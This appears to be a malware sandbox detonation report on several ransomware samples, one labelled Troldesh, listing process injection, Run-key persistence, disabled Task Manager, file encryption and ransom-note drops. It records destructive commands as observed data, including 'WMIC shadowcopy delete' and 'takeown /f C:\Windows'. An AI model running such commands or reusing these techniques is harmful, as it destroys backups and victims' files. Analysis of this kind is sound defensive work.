N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3056 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2796 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2796 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2796 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe

"C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe"

C:\Windows\SysWOW64\wbem\WMIC.exe

"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\"."

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\"."

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 finndev.net udp

Files

memory/3056-0-0x000000007472E000-0x000000007472F000-memory.dmp

memory/3056-1-0x0000000001040000-0x000000000104E000-memory.dmp

memory/3056-2-0x0000000074720000-0x0000000074E0E000-memory.dmp

memory/3056-14-0x000000007472E000-0x000000007472F000-memory.dmp

memory/3056-86-0x0000000074720000-0x0000000074E0E000-memory.dmp

C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EDGE\EDGE.INF.happy

MD5 dbc5243b65101d62b94f3c71abd492a9
SHA1 65d06ffd0ee3b4318173fa2832051010b75ce12c
SHA256 e38ccf5cb2b2127518378113f2743bacb174ff328efc75f6719f1537c18c8405
SHA512 23a2af9939480ffc3040dff5a79ef224f99b1122b1c8554b55c1d454b12dd0461af69695de45e4029b8b706b8ebea276ca693e5099475e565a6fb65cf0f067da

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14752_.GIF.happy

MD5 bac21b523853b4e0d4cb8d25bab07813
SHA1 ec0acc988133f2297877447918ebe268eb84962c
SHA256 3c82891fe84d85311f6d91a3e64d83c5f06e5046ab9fa5d1faed7ed102c8e40f
SHA512 abfd56474cda5699ee9322d6edf014292b71d7d3d6da0a585f1821453313eb3f29fe15c37f1584800d3c866ab568fa90c5fb2dd585ea840025c88817e3196662

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15057_.GIF.happy

MD5 84c245b9e2bcaa040651c930a68848ba
SHA1 8a127f877fee17d7f88e9d584db2d8339548bdc8
SHA256 aa4d7d217931d8a6fd9d822c941d559c26820cd5ea247a3754553cdd1a1a43a2
SHA512 62ef5cf49ba6a7eabc32bfaf8d018f8bda8fa126cdb75616007d8cfb3caa827f67f41390524e2d3d1c44cdde0d061d4743b72a7d99e6bf8f6666418ae1770830

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21377_.GIF.happy

MD5 762ecbe25b0a0c090f25d54135a2bba9
SHA1 5b8bb7260ee48c3a882c782dbaa6c77c934594d1
SHA256 d9211ee8f1cdadd8fe3a4bd4c588ae33f3a5fe41cab8f012c1306a01647394a3
SHA512 115c516bd4dca3f95bfb0a798b3e433304b710fd0fc8bba6a21115580226c459227f18c30fbd707f55f82b85f3cb9dd3ee20c5ea8385e1dde9616db4d76685d9

C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21399_.GIF.happy

MD5 7987e50f723c961b923a647331833535
SHA1 def607e5cdffcb3dbeae3323b1677a431595ec70
SHA256 8c309b2d6e139db42bdcf11877952f6c0c3b2fe830831203f3ee1540ab2ae66a
SHA512 e1cfbc3032aa6952548e47597f33823569582fd1c8689fa9cbf86eb7bd62ab791f9e92312fe8f8814ffa038144aa8af37994077e7d5eac1d6d8a78010eac9ee3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\HEADER.GIF.happy

MD5 45bd5bd092121df1cfcb0489bf47f124
SHA1 c65807db9286e2eea58890538ea40cf2e0686c5e
SHA256 dec76487284a836d9ebb829452b2a728e42a547d756af7fc8542207b0c77909e
SHA512 46f5394a91dff835e572d90a793ff6cebe84ea803401a26e206a8444daa774bb2bfa528a79b6eb74a4c88e3a027deef50ef6a97b45000b82c68c7ddb7818f696

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

123s

Max time network

197s

Command Line

"C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe"

Signatures

Troldesh family

troldesh

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe

"C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe"

Network

Country Destination Domain Proto
N/A 127.0.0.1:49201 tcp
US 154.35.32.5:443 tcp
US 208.83.223.34:80 tcp
DE 131.188.40.189:443 tcp

Files

memory/2136-0-0x0000000000400000-0x00000000005DA000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe"

Signatures

Renames multiple (2207) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\drivers\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RYiGElV1ZFlQ3US.exe" C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\wiabr007.inf_amd64_neutral_442d902f3f3dd5b7\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Signing.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmtron.inf_amd64_neutral_1121c7f92e9e3001\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky303.inf_amd64_ja-jp_b054bb0d59e0a3ad\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wsdscdrv.inf_amd64_neutral_47406488f9e8d5b8\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\zh-TW\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mchgr.inf_amd64_neutral_407146dba80d1566\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc10.inf_amd64_neutral_2c5d0c618dbfaf2a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnrc303.inf_amd64_ja-jp_b0dcc6693f67451a\Amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\InstallShield\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_arrays.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx002.inf_amd64_neutral_12563574abbc36eb\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\sbp2.inf_amd64_neutral_332943647e950ada\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_remote_requirements.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_preference_variables.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_amd64_neutral_857ff0fa9c73850a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\UltimateE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_logical_operators.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_amd64_neutral_814744dd97ccf09f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Arithmetic_Operators.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_join.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep00c.inf_amd64_neutral_f0d9ddf52f04765c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_debuggers.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Throw.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Windows_PowerShell_2.0.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_properties.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep003.inf_amd64_neutral_92ed2d842e0dd4ea\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx007.inf_amd64_neutral_0b796ee4978458e2\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\StarterN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmmhrtz.inf_amd64_neutral_10affee00545fb45\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_aliases.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc11.inf_amd64_neutral_bb18e5f134c40c68\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-COM-DTC-Setup-DL\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\migwiz\PostMigRes\Web\base_images\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_environment_variables.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Return.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_environment_variables.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasicE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_PSSnapins.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Language_Keywords.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_eventlogs.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\EnterpriseN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netvfx64.inf_amd64_neutral_194cb6d2ea3a486e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr004.inf_amd64_neutral_a78e168d6944619a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\ProfessionalE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\ras\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\XPSViewer\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep00d.inf_amd64_neutral_dd61103f3a2743d4\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\UltimateN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-International-Core-DL\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\sv-SE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_debuggers.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\Enterprise\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Reserved_Words.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdm5674a.inf_amd64_neutral_46f893a4f998bb46\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\ProfessionalE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Session_Configurations.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_debuggers.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_arrays.help.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\kab\LC_MESSAGES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\Microsoft Games\More Games\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14513_.GIF C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\da.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files\DVD Maker\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe N/A
